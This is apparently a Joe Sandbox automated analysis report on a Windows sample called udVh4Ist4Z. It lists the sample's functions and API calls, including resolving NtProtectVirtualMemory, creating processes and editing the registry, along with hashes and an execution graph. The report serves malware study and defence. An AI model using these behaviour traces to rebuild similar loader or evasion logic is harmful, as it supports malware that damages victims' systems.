                                                                                        • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 02D6E6B3
                                                                                        • SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 02D6E6CC
                                                                                        • VariantCopy.OLEAUT32(?,00000000), ref: 02D6E701
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2148779306.0000000002D61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2148733672.0000000002D60000.00000002.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000000.00000002.2149075282.0000000002D8B000.00000004.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_2d60000_udVh4Ist4Z.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ArraySafe$BoundIndex$CopyCreateVariant
                                                                                        • String ID:
                                                                                        • API String ID: 351091851-0
                                                                                        • Opcode ID: a9a696700a5c398af6b49de9a61da99d4f96f00f59c5a2cf8b5ab96da2f16d4b
                                                                                        • Instruction ID: cf40c33f8018591119f15516559dc229117cee4661183b7a20566d18b9a8048a
                                                                                        • Opcode Fuzzy Hash: a9a696700a5c398af6b49de9a61da99d4f96f00f59c5a2cf8b5ab96da2f16d4b
                                                                                        • Instruction Fuzzy Hash: 7751E879A006299FCB22DB98D884FE9B7BEEB4D300F0041E5E508A7351D730AF858F61
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02D6357E
                                                                                        • RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,02D635CD,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02D635B1
                                                                                        • RegCloseKey.ADVAPI32(?,02D635D4,00000000,?,00000004,00000000,02D635CD,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02D635C7
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2148779306.0000000002D61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2148733672.0000000002D60000.00000002.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000000.00000002.2149075282.0000000002D8B000.00000004.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_2d60000_udVh4Ist4Z.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CloseOpenQueryValue
                                                                                        • String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
                                                                                        • API String ID: 3677997916-4173385793
                                                                                        • Opcode ID: 23c9fcbcc38a48fe145215e183e14f81588aaa8e299b6efbd2e2838cb530a4ac
                                                                                        • Instruction ID: 18aec5c3e991785a56bafd0160923656313942c701ae5a578a35c1256d43de73
                                                                                        • Opcode Fuzzy Hash: 23c9fcbcc38a48fe145215e183e14f81588aaa8e299b6efbd2e2838cb530a4ac
                                                                                        • Instruction Fuzzy Hash: 8F01F575A50248BBEB11DB909C06BBDB3ECEB08B00F1004A2FA04D7780E6749E14DB64
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • GetThreadLocale.KERNEL32(?,00000000,02D6AAA3,?,?,00000000), ref: 02D6AA24
                                                                                          • Part of subcall function 02D6A780: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02D6A79E
                                                                                        • GetThreadLocale.KERNEL32(00000000,00000004,00000000,02D6AAA3,?,?,00000000), ref: 02D6AA54
                                                                                        • EnumCalendarInfoA.KERNEL32(Function_0000A958,00000000,00000000,00000004), ref: 02D6AA5F
                                                                                        • GetThreadLocale.KERNEL32(00000000,00000003,00000000,02D6AAA3,?,?,00000000), ref: 02D6AA7D
                                                                                        • EnumCalendarInfoA.KERNEL32(Function_0000A994,00000000,00000000,00000003), ref: 02D6AA88
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2148779306.0000000002D61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2148733672.0000000002D60000.00000002.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000000.00000002.2149075282.0000000002D8B000.00000004.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_2d60000_udVh4Ist4Z.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Locale$InfoThread$CalendarEnum
                                                                                        • String ID:
                                                                                        • API String ID: 4102113445-0
                                                                                        • Opcode ID: 313c7470a3e7dd6f8acca1425ee0b9e9149b472610aa057c650e450d782fe718
                                                                                        • Instruction ID: 68b02ec2e1c4c2fa7cecc05b8ab80174712e16d2d3c800203acd8fed4888bf69
                                                                                        • Opcode Fuzzy Hash: 313c7470a3e7dd6f8acca1425ee0b9e9149b472610aa057c650e450d782fe718
                                                                                        • Instruction Fuzzy Hash: F6012B712042847FF311AB74DD1AF7E769EDB46720FA10162F540B67C0D669DE008AF4
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                          • Part of subcall function 02D6352C: GetKeyboardType.USER32(00000000), ref: 02D63531
                                                                                          • Part of subcall function 02D6352C: GetKeyboardType.USER32(00000001), ref: 02D6353D
                                                                                        • GetCommandLineA.KERNEL32(2C02D9C5), ref: 02D8A06C
                                                                                        • GetACP.KERNEL32(2C02D9C5), ref: 02D8A080
                                                                                        • GetCurrentThreadId.KERNEL32 ref: 02D8A08A
                                                                                          • Part of subcall function 02D6355C: RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02D6357E
                                                                                          • Part of subcall function 02D6355C: RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,02D635CD,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02D635B1
                                                                                          • Part of subcall function 02D6355C: RegCloseKey.ADVAPI32(?,02D635D4,00000000,?,00000004,00000000,02D635CD,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02D635C7
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2148779306.0000000002D61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2148733672.0000000002D60000.00000002.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000000.00000002.2149075282.0000000002D8B000.00000004.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_2d60000_udVh4Ist4Z.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: KeyboardType$CloseCommandCurrentLineOpenQueryThreadValue
                                                                                        • String ID: p'h
                                                                                        • API String ID: 3316616684-840755789
                                                                                        • Opcode ID: b71207c3504044560510f12dac7a7992f7fcffa95691f3d5fe7d00cc210101bb
                                                                                        • Instruction ID: 362a9b053f83a4937f0558b41e2b5913ded7d9eaabede7dae291f2e366befe95
                                                                                        • Opcode Fuzzy Hash: b71207c3504044560510f12dac7a7992f7fcffa95691f3d5fe7d00cc210101bb
                                                                                        • Instruction Fuzzy Hash: 7641D86044E3C24FD703AB7458691A43FB09E17214B2E49DBC9C0DF2B7D6285C2BEB62
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • GetThreadLocale.KERNEL32(?,00000000,02D6AC8C,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 02D6AAEB
                                                                                          • Part of subcall function 02D6A780: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02D6A79E
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2148779306.0000000002D61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2148733672.0000000002D60000.00000002.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000000.00000002.2149075282.0000000002D8B000.00000004.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_2d60000_udVh4Ist4Z.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Locale$InfoThread
                                                                                        • String ID: eeee$ggg$yyyy
                                                                                        • API String ID: 4232894706-1253427255
                                                                                        • Opcode ID: 375722186085bd86b9f5bcba328b029ba8a1169cc7909cd7b917a3d7462f0cc6
                                                                                        • Instruction ID: 11a059726fe4fd503635434b64b348868d33f19c6ba0e05dbf59ba535d971281
                                                                                        • Opcode Fuzzy Hash: 375722186085bd86b9f5bcba328b029ba8a1169cc7909cd7b917a3d7462f0cc6
                                                                                        • Instruction Fuzzy Hash: EE41E0387041064BCB21EBB9899C2BEB3EBEB86300F654566D4C2E7344DA34ED06DA71
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtProtectVirtualMemory), ref: 02D77A09
                                                                                        • GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 02D77A0F
                                                                                        Strings
                                                                                        • NtProtectVirtualMemory, xrefs: 02D779FF
                                                                                        • C:\Windows\System32\ntdll.dll, xrefs: 02D77A04
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2148779306.0000000002D61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2148733672.0000000002D60000.00000002.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000000.00000002.2149075282.0000000002D8B000.00000004.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_2d60000_udVh4Ist4Z.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AddressHandleModuleProc
                                                                                        • String ID: C:\Windows\System32\ntdll.dll$NtProtectVirtualMemory
                                                                                        • API String ID: 1646373207-1386159242
                                                                                        • Opcode ID: 9db151ce22a8e09c651650d6c8db568906e2e42c68f0997337647f3354affbf7
                                                                                        • Instruction ID: 2778fb2c762e395a459ea7632e72a8af46f2daa641a7edb77117c2145b871f62
                                                                                        • Opcode Fuzzy Hash: 9db151ce22a8e09c651650d6c8db568906e2e42c68f0997337647f3354affbf7
                                                                                        • Instruction Fuzzy Hash: 95E0BFB555024E7FAB40DEE8EC45D9B77DCAB19200B404401BA19E7301D674ED119FB0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • GetModuleHandleA.KERNEL32(kernel32.dll,?,02D8A10B,00000000,02D8A11E), ref: 02D6C436
                                                                                        • GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA), ref: 02D6C447
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2148779306.0000000002D61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2148733672.0000000002D60000.00000002.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000000.00000002.2149075282.0000000002D8B000.00000004.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_2d60000_udVh4Ist4Z.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AddressHandleModuleProc
                                                                                        • String ID: GetDiskFreeSpaceExA$kernel32.dll
                                                                                        • API String ID: 1646373207-3712701948
                                                                                        • Opcode ID: a390035fb44ad071c194f8ded2e4b4f44d78d47e05acd896fc85b16e2343f1f6
                                                                                        • Instruction ID: 4323a719c09403185257ced2b2cef232b73fafa37c2b99b5c0efd441036fce6a
                                                                                        • Opcode Fuzzy Hash: a390035fb44ad071c194f8ded2e4b4f44d78d47e05acd896fc85b16e2343f1f6
                                                                                        • Instruction Fuzzy Hash: 16D05E60AB03455FFB00EAB2788C63523ECC305709F00882BE04195700D6A5EC188FA0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 02D6E253
                                                                                        • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 02D6E26F
                                                                                        • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 02D6E2E6
                                                                                        • VariantClear.OLEAUT32(?), ref: 02D6E30F
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2148779306.0000000002D61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2148733672.0000000002D60000.00000002.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000000.00000002.2149075282.0000000002D8B000.00000004.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_2d60000_udVh4Ist4Z.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ArraySafe$Bound$ClearIndexVariant
                                                                                        • String ID:
                                                                                        • API String ID: 920484758-0
                                                                                        • Opcode ID: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
                                                                                        • Instruction ID: 65a06a19f248be394a0b4e79be780db20574f56adc34e67976ba97a1fe3d0926
                                                                                        • Opcode Fuzzy Hash: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
                                                                                        • Instruction Fuzzy Hash: 7441E779A002199FCB61DB58C898FE9B7BEEB4C604F0081D5E648A7351DB34AF818F60
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • VirtualQuery.KERNEL32(?,?,0000001C), ref: 02D6AD15
                                                                                        • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 02D6AD39
                                                                                        • GetModuleFileNameA.KERNEL32(02D60000,?,00000105), ref: 02D6AD54
                                                                                        • LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 02D6ADEA
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2148779306.0000000002D61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2148733672.0000000002D60000.00000002.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000000.00000002.2149075282.0000000002D8B000.00000004.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_2d60000_udVh4Ist4Z.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: FileModuleName$LoadQueryStringVirtual
                                                                                        • String ID:
                                                                                        • API String ID: 3990497365-0
                                                                                        • Opcode ID: 8dfe3735e2f989689cd475c7cd7a1c29fd939658e03f5c6c09a8ef5701d1f88a
                                                                                        • Instruction ID: dff9fed9fde4a0c4fe68bd2dbca181ed8a30c9ba7566e848810008780a242aa8
                                                                                        • Opcode Fuzzy Hash: 8dfe3735e2f989689cd475c7cd7a1c29fd939658e03f5c6c09a8ef5701d1f88a
                                                                                        • Instruction Fuzzy Hash: 00412C71A402599BDB21DB68CC88BEAB7FDEB08301F4044E5A548E7351EB749F84CF60
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • VirtualQuery.KERNEL32(?,?,0000001C), ref: 02D6AD15
                                                                                        • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 02D6AD39
                                                                                        • GetModuleFileNameA.KERNEL32(02D60000,?,00000105), ref: 02D6AD54
                                                                                        • LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 02D6ADEA
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2148779306.0000000002D61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2148733672.0000000002D60000.00000002.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000000.00000002.2149075282.0000000002D8B000.00000004.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_2d60000_udVh4Ist4Z.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: FileModuleName$LoadQueryStringVirtual
                                                                                        • String ID:
                                                                                        • API String ID: 3990497365-0
                                                                                        • Opcode ID: 9c25985fe05d716be20f5fb9f0e164be166ef1d422859df989e0a3cd80c97b61
                                                                                        • Instruction ID: 96b54bbb8cb5b034dfd6ec13300ad9aaf372acd316d8889b464131fc799bc3b0
                                                                                        • Opcode Fuzzy Hash: 9c25985fe05d716be20f5fb9f0e164be166ef1d422859df989e0a3cd80c97b61
                                                                                        • Instruction Fuzzy Hash: EE412C70A402589BDB21DB68CC88BEAB7EDEB08301F4040E5A548E7351EB749F88CF60
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2148779306.0000000002D61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2148733672.0000000002D60000.00000002.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000000.00000002.2149075282.0000000002D8B000.00000004.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_2d60000_udVh4Ist4Z.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 2cb8f47092eb36538797c7f5b7103818dd7cdf1f9f82e4e329f41d2ff6d914d9
                                                                                        • Instruction ID: 6c00efc4ea11a1b3ac80a64d56d52b77b51086f4921d7abd5b31543bf310a23c
                                                                                        • Opcode Fuzzy Hash: 2cb8f47092eb36538797c7f5b7103818dd7cdf1f9f82e4e329f41d2ff6d914d9
                                                                                        • Instruction Fuzzy Hash: E6A1C1A67106010BD718AA7C9C893BDB3C2DBC4325F28827EE51DCB3C5EB68CD56C660
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,02D69596), ref: 02D6952E
                                                                                        • GetDateFormatA.KERNEL32(00000000,00000004,?,00000000,?,00000100,00000000,02D69596), ref: 02D69534
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2148779306.0000000002D61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2148733672.0000000002D60000.00000002.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000000.00000002.2149075282.0000000002D8B000.00000004.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_2d60000_udVh4Ist4Z.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: DateFormatLocaleThread
                                                                                        • String ID: yyyy
                                                                                        • API String ID: 3303714858-3145165042
                                                                                        • Opcode ID: a0da6e99c7831421ddfbc4d9a48fedf80eb6e91045dfda723a6a4530aed8ea4f
                                                                                        • Instruction ID: eacf0917b9742c22dddf3cc92d3d572112be156143d34ae7cf6fca1e2e14ab71
                                                                                        • Opcode Fuzzy Hash: a0da6e99c7831421ddfbc4d9a48fedf80eb6e91045dfda723a6a4530aed8ea4f
                                                                                        • Instruction Fuzzy Hash: D4217171A012189BDB21DFA4D955AFEB3F9EF48710F5100A6E905E7340E730DE44CBA1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2148779306.0000000002D61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2148733672.0000000002D60000.00000002.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000000.00000002.2149075282.0000000002D8B000.00000004.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_2d60000_udVh4Ist4Z.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AllocValue
                                                                                        • String ID: i
                                                                                        • API String ID: 1189806713-1314162127
                                                                                        • Opcode ID: 85d8edb3d2651fbc26113ee1f7d463b61cca02f0f8c1cfe77f0a71bf15516822
                                                                                        • Instruction ID: d6be20cd1196c4d91146da4b5c064e1efa89aafb59d5a7fc74ddc86aae44c6d6
                                                                                        • Opcode Fuzzy Hash: 85d8edb3d2651fbc26113ee1f7d463b61cca02f0f8c1cfe77f0a71bf15516822
                                                                                        • Instruction Fuzzy Hash: 8DC002A0D647829BEF00BBB6A94862927ADEB05345F084926A450C774ADB3CDC14DFB4
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • IsBadReadPtr.KERNEL32(?,00000004,?,00000004,?,00000008), ref: 02D79FD0
                                                                                        • IsBadWritePtr.KERNEL32(?,00000004,?,00000004,?,00000004,?,00000008), ref: 02D7A000
                                                                                        • IsBadReadPtr.KERNEL32(?,00000008), ref: 02D7A01F
                                                                                        • IsBadReadPtr.KERNEL32(?,00000004,?,00000008), ref: 02D7A02B
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2148779306.0000000002D61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2148733672.0000000002D60000.00000002.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000000.00000002.2149075282.0000000002D8B000.00000004.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_2d60000_udVh4Ist4Z.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Read$Write
                                                                                        • String ID:
                                                                                        • API String ID: 3448952669-0
                                                                                        • Opcode ID: 3ad3bb96e2a10f813d86af9a74392d0af8acae6b90b2c130b1f55d269701f8a3
                                                                                        • Instruction ID: 83162dab7a287d875fa94fc16a8682865bace0bfaa8ca9eed1ca2a46415d2e0f
                                                                                        • Opcode Fuzzy Hash: 3ad3bb96e2a10f813d86af9a74392d0af8acae6b90b2c130b1f55d269701f8a3
                                                                                        • Instruction Fuzzy Hash: 0321A27164021AABDB10CF69CC80BAEB3A9EF84351F148955EE1097388E73CEC11CAA4
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Execution Graph

                                                                                        Execution Coverage:2%
                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                        Signature Coverage:28.8%
                                                                                        Total number of Nodes:744
                                                                                        Total number of Limit Nodes:23
                                                                                        execution_graph 46917 434887 46918 434893 CallCatchBlock 46917->46918 46944 434596 46918->46944 46920 43489a 46922 4348c3 46920->46922 47232 4349f9 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 46920->47232 46929 434902 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 46922->46929 47233 444251 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 46922->47233 46924 4348dc 46926 4348e2 CallCatchBlock 46924->46926 47234 4441f5 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 46924->47234 46927 434962 46955 434b14 46927->46955 46929->46927 47235 4433e7 35 API calls 6 library calls 46929->47235 46937 434984 46938 43498e 46937->46938 47237 44341f 28 API calls _Atexit 46937->47237 46940 434997 46938->46940 47238 4433c2 28 API calls _Atexit 46938->47238 47239 43470d 13 API calls 2 library calls 46940->47239 46943 43499f 46943->46926 46945 43459f 46944->46945 47240 434c52 IsProcessorFeaturePresent 46945->47240 46947 4345ab 47241 438f31 10 API calls 4 library calls 46947->47241 46949 4345b0 46954 4345b4 46949->46954 47242 4440bf IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 46949->47242 46951 4345bd 46952 4345cb 46951->46952 47243 438f5a 8 API calls 3 library calls 46951->47243 46952->46920 46954->46920 47244 436e90 46955->47244 46958 434968 46959 4441a2 46958->46959 47246 44f059 46959->47246 46961 4441ab 46962 434971 46961->46962 47250 446815 35 API calls 46961->47250 46964 40e9c5 46962->46964 47252 41cb50 LoadLibraryA GetProcAddress 46964->47252 46966 40e9e1 GetModuleFileNameW 47257 40f3c3 46966->47257 46968 40e9fd 47272 4020f6 46968->47272 46971 4020f6 28 API calls 46972 40ea1b 46971->46972 47278 41be1b 46972->47278 46976 40ea2d 47304 401e8d 46976->47304 46978 40ea36 46979 40ea93 46978->46979 46980 
40ea49 46978->46980 47310 401e65 46979->47310 47509 40fbb3 116 API calls 46980->47509 46983 40ea5b 46985 401e65 22 API calls 46983->46985 46984 40eaa3 46987 401e65 22 API calls 46984->46987 46986 40ea67 46985->46986 47510 410f37 36 API calls __EH_prolog 46986->47510 46988 40eac2 46987->46988 47315 40531e 46988->47315 46991 40ead1 47320 406383 46991->47320 46992 40ea79 47511 40fb64 77 API calls 46992->47511 46996 40ea82 47512 40f3b0 70 API calls 46996->47512 47002 401fd8 11 API calls 47004 40eefb 47002->47004 47003 401fd8 11 API calls 47005 40eafb 47003->47005 47236 4432f6 GetModuleHandleW 47004->47236 47006 401e65 22 API calls 47005->47006 47007 40eb04 47006->47007 47337 401fc0 47007->47337 47009 40eb0f 47010 401e65 22 API calls 47009->47010 47011 40eb28 47010->47011 47012 401e65 22 API calls 47011->47012 47013 40eb43 47012->47013 47014 40ebae 47013->47014 47513 406c1e 28 API calls 47013->47513 47015 401e65 22 API calls 47014->47015 47022 40ebbb 47015->47022 47017 40eb70 47018 401fe2 28 API calls 47017->47018 47019 40eb7c 47018->47019 47020 401fd8 11 API calls 47019->47020 47023 40eb85 47020->47023 47021 40ec02 47341 40d069 47021->47341 47022->47021 47027 413549 3 API calls 47022->47027 47514 413549 RegOpenKeyExA 47023->47514 47025 40ec08 47026 40ea8b 47025->47026 47344 41b2c3 47025->47344 47026->47002 47033 40ebe6 47027->47033 47031 40f34f 47546 4139a9 30 API calls 47031->47546 47032 40ec23 47035 40ec76 47032->47035 47361 407716 47032->47361 47033->47021 47517 4139a9 30 API calls 47033->47517 47036 401e65 22 API calls 47035->47036 47039 40ec7f 47036->47039 47047 40ec90 47039->47047 47048 40ec8b 47039->47048 47041 40f365 47547 412475 65 API calls ___scrt_fastfail 47041->47547 47042 40ec42 47518 407738 30 API calls 47042->47518 47043 40ec4c 47046 401e65 22 API calls 47043->47046 47057 40ec55 47046->47057 47053 401e65 22 API calls 47047->47053 47521 407755 CreateProcessA CloseHandle CloseHandle ___scrt_fastfail 47048->47521 47049 40ec47 47519 407260 97 API calls 
47049->47519 47050 41bc5e 28 API calls 47054 40f37f 47050->47054 47055 40ec99 47053->47055 47548 413a23 RegOpenKeyExW RegDeleteValueW 47054->47548 47365 41bc5e 47055->47365 47057->47035 47060 40ec71 47057->47060 47059 40eca4 47369 401f13 47059->47369 47520 407260 97 API calls 47060->47520 47061 40f392 47065 401f09 11 API calls 47061->47065 47067 40f39c 47065->47067 47069 401f09 11 API calls 47067->47069 47071 40f3a5 47069->47071 47070 401e65 22 API calls 47072 40ecc1 47070->47072 47549 40dd42 27 API calls 47071->47549 47076 401e65 22 API calls 47072->47076 47074 40f3aa 47550 414f2a 169 API calls _strftime 47074->47550 47078 40ecdb 47076->47078 47079 401e65 22 API calls 47078->47079 47080 40ecf5 47079->47080 47081 401e65 22 API calls 47080->47081 47083 40ed0e 47081->47083 47082 40ed7b 47085 40ed8a 47082->47085 47090 40ef06 ___scrt_fastfail 47082->47090 47083->47082 47084 401e65 22 API calls 47083->47084 47088 40ed23 _wcslen 47084->47088 47086 401e65 22 API calls 47085->47086 47092 40ee0f 47085->47092 47087 40ed9c 47086->47087 47089 401e65 22 API calls 47087->47089 47088->47082 47093 401e65 22 API calls 47088->47093 47091 40edae 47089->47091 47524 4136f8 RegOpenKeyExA RegQueryValueExA RegCloseKey 47090->47524 47096 401e65 22 API calls 47091->47096 47114 40ee0a ___scrt_fastfail 47092->47114 47094 40ed3e 47093->47094 47098 401e65 22 API calls 47094->47098 47097 40edc0 47096->47097 47101 401e65 22 API calls 47097->47101 47099 40ed53 47098->47099 47381 40da34 47099->47381 47100 40ef51 47102 401e65 22 API calls 47100->47102 47104 40ede9 47101->47104 47105 40ef76 47102->47105 47110 401e65 22 API calls 47104->47110 47525 402093 47105->47525 47107 401f13 28 API calls 47109 40ed72 47107->47109 47112 401f09 11 API calls 47109->47112 47113 40edfa 47110->47113 47111 40ef88 47531 41376f 14 API calls 47111->47531 47112->47082 47439 40cdf9 47113->47439 47114->47092 47522 413947 31 API calls 47114->47522 47118 40ef9e 47120 401e65 22 API calls 47118->47120 47119 40eea3 ctype 47122 

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                          • Part of subcall function 0041CB50: LoadLibraryA.KERNELBASE(Psapi,GetProcessImageFileNameW,?,?,?,?,0040E9E1), ref: 0041CB65
